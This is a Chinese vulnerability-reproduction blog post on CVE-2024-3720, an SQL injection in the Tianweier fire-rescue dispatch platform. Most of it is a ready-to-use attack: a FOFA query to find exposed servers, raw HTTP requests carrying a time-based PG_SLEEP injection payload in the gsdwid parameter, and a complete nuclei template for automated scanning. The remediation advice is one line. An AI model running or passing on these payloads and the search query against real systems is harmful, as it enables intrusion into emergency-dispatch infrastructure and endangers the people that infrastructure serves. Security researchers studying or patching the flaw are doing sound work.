CVE-2024-3720漏洞复现

admin 2024年5月20日20:51:36评论52 views字数 2875阅读9分35秒阅读模式

使

01

漏洞名称

天维尔消防救援作战调度平台 SQL注入漏洞

02

漏洞影响

天维尔消防救援作战调度平台 V1.1.1.1版本

CVE-2024-3720漏洞复现

03

漏洞描述

天维消防智能指挥平台是一个采用先进的信息技术和通信技术的系统,能够快速准确地获取和处理突发事件的信息,实现对灾害现场的实时监控和指挥调度,有效提升应急救援工作的能力和水平。天维消防智能指挥平台1.1.1.1存在一个漏洞,影响组件API接口中/mfsNotice/page文件的未知代码。通过操纵参数gsdwid可以导致SQL注入。

04

FOFA搜索语句
  1. body="天维尔信息科技股份有限公司" && title=="登入"

CVE-2024-3720漏洞复现

05

漏洞复现

创建数据包

  1. POST /twms-service-mfs/mfsNotice/page HTTP/1.1Host: x.x.x.xContent-Length: 106Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/pageAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7Connection: close{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930*"},"hgubmt748n4":"="}

使用sqlmap扫描

CVE-2024-3720漏洞复现

漏洞复现成功

POC数据包如下

  1. POST /twms-service-mfs/mfsNotice/page HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/jsonConnection: close{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

06

nuclei poc

poc文件内容如下

  1. id: CVE-2024-3720info: name: 天维尔消防救援作战调度平台SQL注入漏洞 author: fgz severity: high description: '天维消防智能指挥平台是一个采用先进的信息技术和通信技术的系统,能够快速准确地获取和处理突发事件的信息,实现对灾害现场的实时监控和指挥调度,有效提升应急救援工作的能力和水平。天维消防智能指挥平台1.1.1.1存在一个漏洞,影响组件API接口中/mfsNotice/page文件的未知代码。通过操纵参数gsdwid可以导致SQL注入。' tags: 2024,sqli metadata: max-request: 1 fofa-query: body="天维尔信息科技股份有限公司" && title=="登入" verified: truerequests: - raw: - |- POST /twms-service-mfs/mfsNotice/page HTTP/1.1 Host: {{Hostname}} Content-Length: 106 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://{{Hostname}} Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://{{Hostname}}/twms-service-mfs/mfsNotice/page Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close {"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="} matchers: - type: dsl dsl: - "status_code == 200 && duration>=5 && duration<=8 && contains(body,'请求成功')"

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-3720漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月20日20:51:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-3720漏洞复现https://cn-sec.com/archives/2758517.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息